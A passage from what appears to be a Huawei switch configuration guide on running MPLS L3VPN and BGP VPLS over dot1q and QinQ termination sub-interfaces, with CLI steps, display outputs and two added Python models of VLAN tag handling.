7. Set up EBGP peer relationships between the CE and PE devices so that they can
exchange VPN routing information.

Procedure
Step 1 Configure an IGP on the MPLS backbone network so that the PE and P devices can communicate with each other.
# Configure PE1.
<HUAWEI> system-view
[HUAWEI] sysname PE1
[PE1] interface loopback 1
[PE1-LoopBack1] ip address 1.1.1.9 32
[PE1-LoopBack1] quit
[PE1] vlan batch 30
[PE1] interface gigabitethernet 3/0/0
[PE1-GigabitEthernet3/0/0] port link-type hybrid
[PE1-GigabitEthernet3/0/0] port hybrid pvid vlan 30
[PE1-GigabitEthernet3/0/0] port hybrid untagged vlan 30
[PE1-GigabitEthernet3/0/0] quit
[PE1] interface vlanif 30
[PE1-Vlanif30] ip address 172.1.1.1 24
[PE1-Vlanif30] quit
[PE1] ospf 1
[PE1-ospf-1] area 0
[PE1-ospf-1-area-0.0.0.0] network 172.1.1.0 0.0.0.255
[PE1-ospf-1-area-0.0.0.0] network 1.1.1.9 0.0.0.0
[PE1-ospf-1-area-0.0.0.0] quit
[PE1-ospf-1] quit

# Configure the P.
<HUAWEI> system-view
[HUAWEI] sysname P
[P] interface loopback 1
[P-LoopBack1] ip address 2.2.2.9 32
[P-LoopBack1] quit
[P] vlan batch 30 60
[P] interface gigabitethernet 1/0/0
[P-GigabitEthernet1/0/0] port link-type hybrid
[P-GigabitEthernet1/0/0] port hybrid pvid vlan 30
[P-GigabitEthernet1/0/0] port hybrid untagged vlan 30
[P-GigabitEthernet1/0/0] quit
[P] interface gigabitethernet 2/0/0
[P-GigabitEthernet2/0/0] port link-type hybrid
[P-GigabitEthernet2/0/0] port hybrid pvid vlan 60
[P-GigabitEthernet2/0/0] port hybrid untagged vlan 60
[P-GigabitEthernet2/0/0] quit
[P] interface vlanif 30
[P-Vlanif30] ip address 172.1.1.2 24
[P-Vlanif30] quit
[P] interface vlanif 60
[P-Vlanif60] ip address 172.2.1.1 24
[P-Vlanif60] quit
[P] ospf 1
[P-ospf-1] area 0
[P-ospf-1-area-0.0.0.0] network 172.1.1.0 0.0.0.255
[P-ospf-1-area-0.0.0.0] network 172.2.1.0 0.0.0.255
[P-ospf-1-area-0.0.0.0] network 2.2.2.9 0.0.0.0
[P-ospf-1-area-0.0.0.0] quit
[P-ospf-1] quit

# Configure PE2.
<HUAWEI> system-view
[HUAWEI] sysname PE2
[PE2] interface loopback 1
[PE2-LoopBack1] ip address 3.3.3.9 32
[PE2-LoopBack1] quit
[PE2] vlan batch 60
[PE2] interface gigabitethernet 3/0/0
[PE2-GigabitEthernet3/0/0] port link-type hybrid
[PE2-GigabitEthernet3/0/0] port hybrid pvid vlan 60
[PE2-GigabitEthernet3/0/0] port hybrid untagged vlan 60
[PE2-GigabitEthernet3/0/0] quit
[PE2] interface vlanif 60
[PE2-Vlanif60] ip address 172.2.1.2 24
[PE2-Vlanif60] quit
[PE2] ospf 1
[PE2-ospf-1] area 0
[PE2-ospf-1-area-0.0.0.0] network 172.2.1.0 0.0.0.255
[PE2-ospf-1-area-0.0.0.0] network 3.3.3.9 0.0.0.0
[PE2-ospf-1-area-0.0.0.0] quit
[PE2-ospf-1] quit

After the configuration is complete, OSPF neighbor relationships are set up between PE1, P, and PE2. Run the display ospf peer command on PE1, P, and PE2: the neighbor status is Full. Run the display ip routing-table command on PE1 and PE2: PE1 and PE2 have learned the routes to each other's Loopback1 address. The display on PE1 is used as an example:
[PE1] display ip routing-table
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: Public
Destinations : 8 Routes : 8

Destination/Mask Proto Pre Cost Flags NextHop Interface

1.1.1.9/32 Direct 0 0 D 127.0.0.1 LoopBack1
2.2.2.9/32 OSPF 10 1 D 172.1.1.2 Vlanif30
3.3.3.9/32 OSPF 10 2 D 172.1.1.2 Vlanif30
127.0.0.0/8 Direct 0 0 D 127.0.0.1 InLoopBack0
127.0.0.1/32 Direct 0 0 D 127.0.0.1 InLoopBack0
172.1.1.0/24 Direct 0 0 D 172.1.1.1 Vlanif30
172.1.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif30
172.2.1.0/24 OSPF 10 2 D 172.1.1.2 Vlanif30
[PE1] display ospf peer

OSPF Process 1 with Router ID 1.1.1.9
Neighbors

Area 0.0.0.0 interface 172.1.1.1(Vlanif30)'s neighbors
Router ID: 2.2.2.9 Address: 172.1.1.2
State: Full Mode:Nbr is Master Priority: 1
DR: 172.1.1.2 BDR: 172.1.1.1 MTU: 0
Dead timer due in 37 sec
Retrans timer interval: 5
Neighbor is up for 00:16:21
Authentication Sequence: [ 0 ]

Step 2 Enable basic MPLS capabilities and MPLS LDP on the PE devices to set up LDP LSPs on the
MPLS backbone network.
# Configure PE1.
[PE1] mpls lsr-id 1.1.1.9
[PE1] mpls
[PE1-mpls] quit
[PE1] mpls ldp
[PE1-mpls-ldp] quit
[PE1] interface vlanif 30
[PE1-Vlanif30] mpls
[PE1-Vlanif30] mpls ldp
[PE1-Vlanif30] quit

# Configure the P.
[P] mpls lsr-id 2.2.2.9
[P] mpls
[P-mpls] quit
[P] mpls ldp
[P-mpls-ldp] quit
[P] interface vlanif 30
[P-Vlanif30] mpls
[P-Vlanif30] mpls ldp
[P-Vlanif30] quit
[P] interface vlanif 60
[P-Vlanif60] mpls
[P-Vlanif60] mpls ldp
[P-Vlanif60] quit

# Configure PE2.
[PE2] mpls lsr-id 3.3.3.9
[PE2] mpls
[PE2-mpls] quit
[PE2] mpls ldp
[PE2-mpls-ldp] quit
[PE2] interface vlanif 60
[PE2-Vlanif60] mpls
[PE2-Vlanif60] mpls ldp
[PE2-Vlanif60] quit

After the configuration is complete, LDP sessions are established between PE1 and the P and between the P and PE2. Run the display mpls ldp session command on PE1, P, and PE2: the LDP session status is Operational. Run the display mpls ldp lsp command to view the established LDP LSPs. The display on PE1 is used as an example:
[PE1] display mpls ldp session

LDP Session(s) in Public Network
Codes: LAM(Label Advertisement Mode), SsnAge Unit(DDDD:HH:MM)
A '*' before a session means the session is being deleted.
------------------------------------------------------------------------------
PeerID Status LAM SsnRole SsnAge KASent/Rcv
------------------------------------------------------------------------------
2.2.2.9:0 Operational DU Active 0000:00:01 6/6
------------------------------------------------------------------------------
TOTAL: 1 session(s) Found.
[PE1] display mpls ldp lsp

LDP LSP Information
-------------------------------------------------------------------------------
Flag after Out IF: (I) - LSP Is Only Iterated by RLFA
-------------------------------------------------------------------------------
DestAddress/Mask In/OutLabel UpstreamPeer NextHop OutInterface
-------------------------------------------------------------------------------
1.1.1.9/32 3/NULL 2.2.2.9 127.0.0.1 Inloop0
*1.1.1.9/32 Liberal/1025 DS/2.2.2.9
2.2.2.9/32 NULL/3 - 172.1.1.2 Vlanif30
2.2.2.9/32 1024/3 2.2.2.9 172.1.1.2 Vlanif30
3.3.3.9/32 NULL/1025 - 172.1.1.2 Vlanif30
3.3.3.9/32 1025/1025 2.2.2.9 172.1.1.2 Vlanif30
-------------------------------------------------------------------------------
TOTAL: 5 Normal LSP(s) Found.
TOTAL: 1 Liberal LSP(s) Found.
TOTAL: 0 Frr LSP(s) Found.
A '*' before an LSP means the LSP is not established
A '*' before a Label means the USCB or DSCB is stale
A '*' before a UpstreamPeer means the session is stale
A '*' before a DS means the session is stale
A '*' before a NextHop means the LSP is FRR LSP

Step 3 Configure L3VPN instances on the PE devices. Configure dot1q termination sub-interfaces
for single-tagged packets from vpna. Configure QinQ termination sub-interfaces for double-
tagged packets from vpnb. (Layer 3 service users are identified by VLAN 10 and VLAN 20,
and the PE devices use VLAN 10 and VLAN 100 to identify Layer 3 services.)

# Configure PE1.
[PE1] ip vpn-instance vpna
[PE1-vpn-instance-vpna] route-distinguisher 100:1
[PE1-vpn-instance-vpna-af-ipv4] vpn-target 111:1 both
[PE1-vpn-instance-vpna-af-ipv4] quit
[PE1-vpn-instance-vpna] quit
[PE1] ip vpn-instance vpnb
[PE1-vpn-instance-vpnb] route-distinguisher 100:2
[PE1-vpn-instance-vpnb-af-ipv4] vpn-target 222:2 both
[PE1-vpn-instance-vpnb-af-ipv4] quit
[PE1-vpn-instance-vpnb] quit
[PE1] interface gigabitethernet 1/0/0
[PE1-GigabitEthernet1/0/0] port link-type hybrid
[PE1-GigabitEthernet1/0/0] quit
[PE1] interface gigabitethernet 1/0/0.1
[PE1-GigabitEthernet1/0/0.1] dot1q termination vid 10
[PE1-GigabitEthernet1/0/0.1] ip binding vpn-instance vpna
[PE1-GigabitEthernet1/0/0.1] ip address 10.1.1.2 24
[PE1-GigabitEthernet1/0/0.1] arp broadcast enable
[PE1-GigabitEthernet1/0/0.1] quit
[PE1] interface gigabitethernet 2/0/0
[PE1-GigabitEthernet2/0/0] port link-type hybrid
[PE1-GigabitEthernet2/0/0] quit
[PE1] interface gigabitethernet 2/0/0.1
[PE1-GigabitEthernet2/0/0.1] qinq termination pe-vid 100 ce-vid 20
[PE1-GigabitEthernet2/0/0.1] ip binding vpn-instance vpnb
[PE1-GigabitEthernet2/0/0.1] ip address 10.2.1.2 24
[PE1-GigabitEthernet2/0/0.1] arp broadcast enable
[PE1-GigabitEthernet2/0/0.1] quit

# Configure PE2.
[PE2] ip vpn-instance vpna
[PE2-vpn-instance-vpna] route-distinguisher 200:1
[PE2-vpn-instance-vpna-af-ipv4] vpn-target 111:1 both
[PE2-vpn-instance-vpna-af-ipv4] quit
[PE2-vpn-instance-vpna] quit
[PE2] ip vpn-instance vpnb
[PE2-vpn-instance-vpnb] route-distinguisher 200:2
[PE2-vpn-instance-vpnb-af-ipv4] vpn-target 222:2 both
[PE2-vpn-instance-vpnb-af-ipv4] quit
[PE2-vpn-instance-vpnb] quit
[PE2] interface gigabitethernet 1/0/0
[PE2-GigabitEthernet1/0/0] port link-type hybrid
[PE2-GigabitEthernet1/0/0] quit
[PE2] interface gigabitethernet 1/0/0.1
[PE2-GigabitEthernet1/0/0.1] dot1q termination vid 10
[PE2-GigabitEthernet1/0/0.1] ip binding vpn-instance vpna
[PE2-GigabitEthernet1/0/0.1] ip address 10.3.1.2 24
[PE2-GigabitEthernet1/0/0.1] arp broadcast enable
[PE2-GigabitEthernet1/0/0.1] quit
[PE2] interface gigabitethernet 2/0/0
[PE2-GigabitEthernet2/0/0] port link-type hybrid
[PE2-GigabitEthernet2/0/0] quit
[PE2] interface gigabitethernet 2/0/0.1
[PE2-GigabitEthernet2/0/0.1] qinq termination pe-vid 100 ce-vid 20
[PE2-GigabitEthernet2/0/0.1] ip binding vpn-instance vpnb
[PE2-GigabitEthernet2/0/0.1] ip address 10.4.1.2 24
[PE2-GigabitEthernet2/0/0.1] arp broadcast enable
[PE2-GigabitEthernet2/0/0.1] quit

# Configure CE1 connecting to the headquarters of enterprise A. Configure IP addresses for interfaces of CE2, CE3, and CE4 according to Figure 14-7. The configurations of CE2, CE3, and CE4 are similar to the configuration of CE1 and are not mentioned here.
<HUAWEI> system-view
[HUAWEI] sysname CE1
[CE1] vlan batch 10 to 11
[CE1] interface gigabitethernet 1/0/0
[CE1-GigabitEthernet1/0/0] port link-type hybrid
[CE1-GigabitEthernet1/0/0] port hybrid tagged vlan 10 to 11
[CE1-GigabitEthernet1/0/0] quit
[CE1] interface vlanif 10
[CE1-Vlanif10] ip address 10.1.1.1 24
[CE1-Vlanif10] quit

After the configuration is complete, run the display ip vpn-instance verbose command on
PE1 and PE2 to view VPN instance configuration. The PE devices can ping local CE devices
attached to them.

NOTE
If a PE device has multiple interfaces bound to the same VPN instance, you need to specify a source IP address when pinging the CE device connected to the remote PE device. To specify the source IP address, set the -a source-ip-address parameter in the ping -vpn-instance vpn-instance-name -a source-ip-address dest-ip-address command. If no source IP address is specified, the ping operation fails.

Take the ping test from PE1 to CE1 as an example:
[PE1] display ip vpn-instance verbose
Total VPN-Instances configured : 2
Total IPv4 VPN-Instances configured : 2
Total IPv6 VPN-Instances configured : 0

VPN-Instance Name and ID : vpna, 1
Interfaces : GigabitEthernet1/0/0.1
Address family ipv4
Create date : 2012/07/25 00:58:17 UTC+08:00
Up time : 0 days, 22 hours, 24 minutes and 53 seconds
Route Distinguisher : 100:1
Export VPN Targets : 111:1
Import VPN Targets : 111:1
Label Policy : label per instance
Per-Instance Label : 4096
Log Interval : 5

VPN-Instance Name and ID : vpnb, 2
Interfaces : GigabitEthernet2/0/0.1
Address family ipv4
Create date : 2012/07/25 00:58:17 UTC+08:00
Up time : 0 days, 22 hours, 24 minutes and 53 seconds
Route Distinguisher : 100:2
Export VPN Targets : 222:2
Import VPN Targets : 222:2
Label Policy : label per instance
Per-Instance Label : 4096
Log Interval : 5
[PE1] ping -vpn-instance vpna 10.1.1.1
PING 10.1.1.1: 56 data bytes, press CTRL_C to break
Reply from 10.1.1.1: bytes=56 Sequence=1 ttl=255 time=5 ms
Reply from 10.1.1.1: bytes=56 Sequence=2 ttl=255 time=3 ms
Reply from 10.1.1.1: bytes=56 Sequence=3 ttl=255 time=3 ms
Reply from 10.1.1.1: bytes=56 Sequence=4 ttl=255 time=3 ms
Reply from 10.1.1.1: bytes=56 Sequence=5 ttl=255 time=16 ms

--- 10.1.1.1 ping statistics ---
5 packet(s) transmitted
5 packet(s) received
0.00% packet loss
round-trip min/avg/max = 3/6/16 ms
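The tag handling behind Step 3 here and Step 6 of Example 14.2 (selective QinQ on the access switch, dot1q and qinq termination on the PE), as an added Python model that is not Huawei code; it also includes the VSI bindings PE1 receives in Step 4 below. The sub-interface tables are transcribed from the configuration steps on this page; the switch stacking rules for this example (VLAN 20 to outer 100, VLAN 21 to outer 200) are not shown on the page and are an assumption derived from the pe-vid/ce-vid pairs PE1 terminates.

```python
"""Model of selective QinQ on the access switch and of dot1q/qinq termination
sub-interfaces on the PE.  Added example, not Huawei code.  A frame is reduced
to its VLAN tag stack (outermost tag first); MAC addresses and payload are
omitted because classification depends only on the tags."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

Frame = Tuple[int, ...]   # e.g. (10,) single-tagged, (100, 10) double-tagged


def vlan_stacking(frame: Frame, rules: Dict[int, int]) -> Frame:
    """Selective QinQ on the switch ('port vlan-stacking vlan X stack-vlan Y').

    rules maps a customer VLAN X to the outer VLAN Y the ISP assigned.  Only a
    single-tagged frame whose VID has a rule gets the outer tag pushed; every
    other frame leaves the switch unchanged.
    """
    if len(frame) == 1 and frame[0] in rules:
        return (rules[frame[0]],) + frame
    return frame


@dataclass(frozen=True)
class SubInterface:
    name: str
    kind: str                # "dot1q" or "qinq"
    vid: int                 # dot1q: the VID; qinq: pe-vid (outer tag)
    ce_vid: Optional[int]    # qinq only: ce-vid (inner tag)
    binding: str             # where a matching frame goes: VPN instance, VSI or L2VC

    def matches(self, frame: Frame) -> bool:
        if self.kind == "dot1q":
            return len(frame) == 1 and frame[0] == self.vid
        if self.kind == "qinq":
            return len(frame) == 2 and frame == (self.vid, self.ce_vid)
        raise ValueError(f"unknown termination type {self.kind!r}")


def classify(port: str, frame: Frame,
             pe: Dict[str, List[SubInterface]]) -> Optional[str]:
    """Return the binding of the sub-interface on `port` whose termination
    matches `frame`, or None when none does.  A frame no sub-interface claims
    is dropped by the PE; that is what stops a mis-tagged or forged customer
    frame from entering another customer's VPN instance or VSI."""
    for sub in pe.get(port, []):
        if sub.matches(frame):
            return sub.binding
    return None


def ce_to_pe(frame: Frame, stack_rules: Dict[int, int], port: str,
             pe: Dict[str, List[SubInterface]]) -> Optional[str]:
    """A CE frame crosses the access switch and arrives on the PE port."""
    return classify(port, vlan_stacking(frame, stack_rules), pe)


# --- Tables transcribed from the configuration steps on this page ------------
# 14.2, Switch1 GE1/0/0: port vlan-stacking vlan 10 stack-vlan 100
SWITCH1_14_2 = {10: 100}
# 14.2, PE1 GE1/0/0.1: qinq termination pe-vid 100 ce-vid 10, mpls l2vc 3.3.3.3 101
PE1_14_2 = {
    "GigabitEthernet1/0/0": [
        SubInterface("GigabitEthernet1/0/0.1", "qinq", 100, 10, "l2vc 3.3.3.3 101"),
    ],
}
# 14.3, PE1: Step 3 (L3VPN bindings) and Step 4 (VSI bindings)
PE1_14_3 = {
    "GigabitEthernet1/0/0": [
        SubInterface("GigabitEthernet1/0/0.1", "dot1q", 10, None, "vpn-instance vpna"),
        SubInterface("GigabitEthernet1/0/0.2", "dot1q", 11, None, "vsi vsi1"),
    ],
    "GigabitEthernet2/0/0": [
        SubInterface("GigabitEthernet2/0/0.1", "qinq", 100, 20, "vpn-instance vpnb"),
        SubInterface("GigabitEthernet2/0/0.2", "qinq", 200, 21, "vsi vsi2"),
    ],
}
# 14.3: the switch stacking rules are not on this page.  ASSUMED from the
# pe-vid/ce-vid pairs PE1 terminates: VLAN 20 -> outer 100, VLAN 21 -> outer 200.
SWITCH1_14_3_ASSUMED = {20: 100, 21: 200}


if __name__ == "__main__":
    # 14.2: CE1's VLAN 10 frame becomes (100, 10) and lands in L2VC 101;
    # a VLAN 11 frame gets no outer tag, matches no termination and is dropped.
    print(ce_to_pe((10,), SWITCH1_14_2, "GigabitEthernet1/0/0", PE1_14_2))
    print(ce_to_pe((11,), SWITCH1_14_2, "GigabitEthernet1/0/0", PE1_14_2))
    # 14.3: on GE1/0/0, VLAN 10 is Layer 3 (vpna) and VLAN 11 is Layer 2 (vsi1).
    print(classify("GigabitEthernet1/0/0", (10,), PE1_14_3))
    print(classify("GigabitEthernet1/0/0", (11,), PE1_14_3))
    # 14.3: CE2's VLAN 20, stacked to (100, 20), reaches vpnb; a frame with the
    # right outer tag but the wrong inner tag matches nothing.
    print(ce_to_pe((20,), SWITCH1_14_3_ASSUMED, "GigabitEthernet2/0/0", PE1_14_3))
    print(classify("GigabitEthernet2/0/0", (100, 10), PE1_14_3))
```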

Step 4 Create VPLS VSI instances on PE1 and PE2. In each VSI instance, specify BGP as the
signaling protocol, and set the RD, VPN target and site. Bind sub-interfaces to VSI instances
so that the sub-interfaces function as AC interfaces to provide access for VPLS users.
Configure dot1q termination sub-interfaces for single-tagged packets sent from CE1 and CE3.
Configure QinQ termination sub-interfaces for double-tagged packets sent from CE2 and
CE4. (The CE devices use VLAN 11 and VLAN 21 to identify Layer 2 service users, and the
PE devices use VLAN 11 and VLAN 200 to identify Layer 2 services.)
# Configure PE1.
[PE1] mpls l2vpn
[PE1-l2vpn] quit
[PE1] vsi vsi1 auto
[PE1-vsi-vsi1] pwsignal bgp
[PE1-vsi-vsi1-bgp] route-distinguisher 101:1
[PE1-vsi-vsi1-bgp] vpn-target 100:1 import-extcommunity
[PE1-vsi-vsi1-bgp] vpn-target 100:1 export-extcommunity
[PE1-vsi-vsi1-bgp] site 1 range 5 default-offset 0
[PE1-vsi-vsi1-bgp] quit
[PE1-vsi-vsi1] quit
[PE1] vsi vsi2 auto
[PE1-vsi-vsi2] pwsignal bgp
[PE1-vsi-vsi2-bgp] route-distinguisher 101:2
[PE1-vsi-vsi2-bgp] vpn-target 200:1 import-extcommunity
[PE1-vsi-vsi2-bgp] vpn-target 200:1 export-extcommunity
[PE1-vsi-vsi2-bgp] site 1 range 5 default-offset 0
[PE1-vsi-vsi2-bgp] quit
[PE1-vsi-vsi2] quit
[PE1] interface gigabitethernet 1/0/0.2
[PE1-GigabitEthernet1/0/0.2] dot1q termination vid 11
[PE1-GigabitEthernet1/0/0.2] l2 binding vsi vsi1
[PE1-GigabitEthernet1/0/0.2] quit

[PE1] interface gigabitethernet 2/0/0.2
[PE1-GigabitEthernet2/0/0.2] qinq termination pe-vid 200 ce-vid 21
[PE1-GigabitEthernet2/0/0.2] l2 binding vsi vsi2
[PE1-GigabitEthernet2/0/0.2] quit

# Configure PE2.
[PE2] mpls l2vpn
[PE2-l2vpn] quit
[PE2] vsi vsi1 auto
[PE2-vsi-vsi1] pwsignal bgp
[PE2-vsi-vsi1-bgp] route-distinguisher 201:1
[PE2-vsi-vsi1-bgp] vpn-target 100:1 import-extcommunity
[PE2-vsi-vsi1-bgp] vpn-target 100:1 export-extcommunity
[PE2-vsi-vsi1-bgp] site 2 range 5 default-offset 0
[PE2-vsi-vsi1-bgp] quit
[PE2-vsi-vsi1] quit
[PE2] vsi vsi2 auto
[PE2-vsi-vsi2] pwsignal bgp
[PE2-vsi-vsi2-bgp] route-distinguisher 201:2
[PE2-vsi-vsi2-bgp] vpn-target 200:1 import-extcommunity
[PE2-vsi-vsi2-bgp] vpn-target 200:1 export-extcommunity
[PE2-vsi-vsi2-bgp] site 2 range 5 default-offset 0
[PE2-vsi-vsi2-bgp] quit
[PE2-vsi-vsi2] quit
[PE2] interface gigabitethernet 1/0/0.2
[PE2-GigabitEthernet1/0/0.2] dot1q termination vid 11
[PE2-GigabitEthernet1/0/0.2] l2 binding vsi vsi1
[PE2-GigabitEthernet1/0/0.2] quit
[PE2] interface gigabitethernet 2/0/0.2
[PE2-GigabitEthernet2/0/0.2] qinq termination pe-vid 200 ce-vid 21
[PE2-GigabitEthernet2/0/0.2] l2 binding vsi vsi2
[PE2-GigabitEthernet2/0/0.2] quit

Step 5 Set up EBGP peer relationships between the PE and CE devices and import L3VPN routes
into BGP.
# Configure CE1, which connects to the headquarters of enterprise A. The configurations of CE2,
CE3, and CE4 are similar to that of CE1 and are not described here.
[CE1] bgp 65410
[CE1-bgp] peer 10.1.1.2 as-number 100
[CE1-bgp] import-route direct
[CE1-bgp] quit

# Configure PE1. The configuration of PE2 is similar to that of PE1 and is not described
here.
[PE1] bgp 100
[PE1-bgp] ipv4-family vpn-instance vpna
[PE1-bgp-vpna] peer 10.1.1.1 as-number 65410
[PE1-bgp-vpna] import-route direct
[PE1-bgp-vpna] quit
[PE1-bgp] ipv4-family vpn-instance vpnb
[PE1-bgp-vpnb] peer 10.2.1.1 as-number 65420
[PE1-bgp-vpnb] import-route direct
[PE1-bgp-vpnb] quit
[PE1-bgp] quit

After the configuration is complete, run the display bgp vpnv4 vpn-instance peer command
on the PE devices. The command output shows that the BGP peer relationships between the
PE and CE devices have been set up and are in the Established state.
The BGP peer relationship between PE1 and CE1 is used as an example:
[PE1] display bgp vpnv4 vpn-instance vpna peer

BGP local router ID : 1.1.1.9
Local AS number : 100

VPN-Instance vpna, Router ID 1.1.1.9:
Total number of peers : 1                 Peers in established state : 1

Peer        V  AS     MsgRcvd  MsgSent  OutQ  Up/Down   State        PrefRcv
10.1.1.1    4  65410  11       9        0     00:07:25  Established  1

Step 6 Set up an MP-IBGP peer relationship between PE1 and PE2.

# Configure PE1.
[PE1] bgp 100
[PE1-bgp] peer 3.3.3.9 as-number 100
[PE1-bgp] peer 3.3.3.9 connect-interface loopback 1
[PE1-bgp] ipv4-family vpnv4
[PE1-bgp-af-vpnv4] peer 3.3.3.9 enable
[PE1-bgp-af-vpnv4] quit
[PE1-bgp] vpls-family
[PE1-bgp-af-vpls] peer 3.3.3.9 enable
[PE1-bgp-af-vpls] quit
[PE1-bgp] quit

# Configure PE2.
[PE2] bgp 100
[PE2-bgp] peer 1.1.1.9 as-number 100
[PE2-bgp] peer 1.1.1.9 connect-interface loopback 1
[PE2-bgp] ipv4-family vpnv4
[PE2-bgp-af-vpnv4] peer 1.1.1.9 enable
[PE2-bgp-af-vpnv4] quit
[PE2-bgp] vpls-family
[PE2-bgp-af-vpls] peer 1.1.1.9 enable
[PE2-bgp-af-vpls] quit
[PE2-bgp] quit

Step 7 Configure selective QinQ on CE-side interfaces of the switches and specify the VLANs
allowed by the interfaces.

# Configure Switch1.
<HUAWEI> system-view
[HUAWEI] sysname Switch1
[Switch1] vlan batch 100 200
[Switch1] interface gigabitethernet 2/0/0
[Switch1-GigabitEthernet2/0/0] port link-type hybrid
[Switch1-GigabitEthernet2/0/0] port hybrid tagged vlan 100 200
[Switch1-GigabitEthernet2/0/0] quit
[Switch1] interface gigabitethernet 1/0/0
[Switch1-GigabitEthernet1/0/0] port link-type hybrid
[Switch1-GigabitEthernet1/0/0] port hybrid untagged vlan 100 200
[Switch1-GigabitEthernet1/0/0] port vlan-stacking vlan 20 stack-vlan 100
[Switch1-GigabitEthernet1/0/0] port vlan-stacking vlan 21 stack-vlan 200
[Switch1-GigabitEthernet1/0/0] quit

# Configure Switch2.
<HUAWEI> system-view
[HUAWEI] sysname Switch2
[Switch2] vlan batch 100 200
[Switch2] interface gigabitethernet 2/0/0
[Switch2-GigabitEthernet2/0/0] port link-type hybrid
[Switch2-GigabitEthernet2/0/0] port hybrid tagged vlan 100 200
[Switch2-GigabitEthernet2/0/0] quit
[Switch2] interface gigabitethernet 1/0/0
[Switch2-GigabitEthernet1/0/0] port link-type hybrid
[Switch2-GigabitEthernet1/0/0] port hybrid untagged vlan 100 200

[Switch2-GigabitEthernet1/0/0] port vlan-stacking vlan 20 stack-vlan 100
[Switch2-GigabitEthernet1/0/0] port vlan-stacking vlan 21 stack-vlan 200
[Switch2-GigabitEthernet1/0/0] quit
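The tag handling of Steps 4 and 7 can be followed frame by frame. The Python model below is an added example, not Huawei code or command output: it applies Switch1's vlan-stacking rules and PE1's dot1q/qinq termination matches from this example to a single CE frame, and flags any termination sub-interface that the upstream switch can never feed. It assumes CE1 attaches directly to PE1 GE1/0/0 and CE2 reaches PE1 GE2/0/0 through Switch1, as the configuration files imply; PE1_MISCONFIGURED is a constructed variant, not the page's configuration.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Frame:
    tags: Tuple[int, ...]   # VLAN tag stack, outermost first: (21,) or (200, 21)


@dataclass(frozen=True)
class SubIf:
    name: str
    match: Tuple[int, ...]  # (vid,) for dot1q termination, (pe_vid, ce_vid) for qinq termination
    binding: str            # the service the sub-interface is bound to


# Switch1 GE1/0/0 (Step 7): "port vlan-stacking vlan <ce-vid> stack-vlan <stack-vlan>".
SWITCH1_STACKING: Dict[int, int] = {20: 100, 21: 200}

# PE1 sub-interfaces (Step 4 and the PE1 configuration file), keyed by main interface.
PE1_SUBIFS: Dict[str, List[SubIf]] = {
    "GigabitEthernet1/0/0": [
        SubIf("GigabitEthernet1/0/0.1", (10,), "ip binding vpn-instance vpna"),
        SubIf("GigabitEthernet1/0/0.2", (11,), "l2 binding vsi vsi1"),
    ],
    "GigabitEthernet2/0/0": [
        SubIf("GigabitEthernet2/0/0.1", (100, 20), "ip binding vpn-instance vpnb"),
        SubIf("GigabitEthernet2/0/0.2", (200, 21), "l2 binding vsi vsi2"),
    ],
}


def switch_selective_qinq(frame: Frame, stacking: Dict[int, int]) -> Optional[Frame]:
    """Switch1 GE1/0/0 ingress: push the stack VLAN as an outer tag onto a single-tagged
    frame whose C-VLAN has a vlan-stacking rule; any other frame is dropped."""
    if len(frame.tags) != 1 or frame.tags[0] not in stacking:
        return None
    return Frame((stacking[frame.tags[0]], frame.tags[0]))


def pe_terminate(subifs: Dict[str, List[SubIf]], port: str, frame: Frame) -> Optional[SubIf]:
    """Termination sub-interface lookup on the PE: the whole tag stack must match, so a
    double-tagged frame never matches a dot1q (single-tag) termination sub-interface."""
    for sub in subifs.get(port, []):
        if frame.tags == sub.match:
            return sub
    return None


def service_for(ce_vid: int, via_switch: bool) -> Optional[str]:
    """Follow one CE frame tagged with `ce_vid` to the PE1 service it lands in.
    CE1 attaches to PE1 GE1/0/0 directly; CE2 attaches via Switch1 to PE1 GE2/0/0."""
    frame: Optional[Frame] = Frame((ce_vid,))
    port = "GigabitEthernet1/0/0"
    if via_switch:
        frame = switch_selective_qinq(frame, SWITCH1_STACKING)
        port = "GigabitEthernet2/0/0"
    if frame is None:
        return None          # dropped by the switch: no stacking rule for this C-VLAN
    sub = pe_terminate(PE1_SUBIFS, port, frame)
    return sub.binding if sub else None   # None: no sub-interface terminates this stack


def unreachable_terminations(subifs: Dict[str, List[SubIf]], port: str,
                             stacking: Dict[int, int]) -> List[str]:
    """Consistency check: sub-interfaces on `port` whose tag match can never be produced
    by the upstream switch's stacking rules (their VRF or VSI would stay silent)."""
    producible = {(stack, ce) for ce, stack in stacking.items()}
    return [s.name for s in subifs.get(port, []) if s.match not in producible]


# Constructed misconfiguration (not from the page): GE2/0/0.2 terminates a single
# tag 21 although Switch1 delivers the stack (200, 21).
PE1_MISCONFIGURED: Dict[str, List[SubIf]] = {
    "GigabitEthernet2/0/0": [
        SubIf("GigabitEthernet2/0/0.1", (100, 20), "ip binding vpn-instance vpnb"),
        SubIf("GigabitEthernet2/0/0.2", (21,), "l2 binding vsi vsi2"),
    ],
}

if __name__ == "__main__":
    for vid, via in [(10, False), (11, False), (20, True), (21, True), (30, True)]:
        print(f"VLAN {vid} {'via Switch1' if via else 'direct'} -> {service_for(vid, via)}")
    print("never fed:", unreachable_terminations(PE1_MISCONFIGURED, "GigabitEthernet2/0/0",
                                                 SWITCH1_STACKING))
```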

Step 8 Verify the configuration.
Run the display ip routing-table vpn-instance command on PE1 and PE2 to view the
L3VPN routes to the remote CE devices.
The display on PE1 is used as an example:
[PE1] display ip routing-table vpn-instance vpna
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: vpna
Destinations : 3 Routes : 3

Destination/Mask    Proto   Pre  Cost  Flags  NextHop      Interface
10.1.1.0/24         Direct  0    0     D      10.1.1.2     Vlanif10
10.1.1.2/32         Direct  0    0     D      127.0.0.1    Vlanif10
10.3.1.0/24         IBGP    255  0     RD     3.3.3.9      Vlanif30
[PE1] display ip routing-table vpn-instance vpnb
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: vpnb
Destinations : 3 Routes : 3

Destination/Mask    Proto   Pre  Cost  Flags  NextHop      Interface
10.2.1.0/24         Direct  0    0     D      10.2.1.2     Vlanif20
10.2.1.2/32         Direct  0    0     D      127.0.0.1    Vlanif20
10.4.1.0/24         IBGP    255  0     RD     3.3.3.9      Vlanif30

CE devices in the same VPN instance can successfully ping each other, whereas CE devices
in different VPN instances cannot.
For example, CE1 connecting to the headquarters of enterprise A can successfully ping CE3
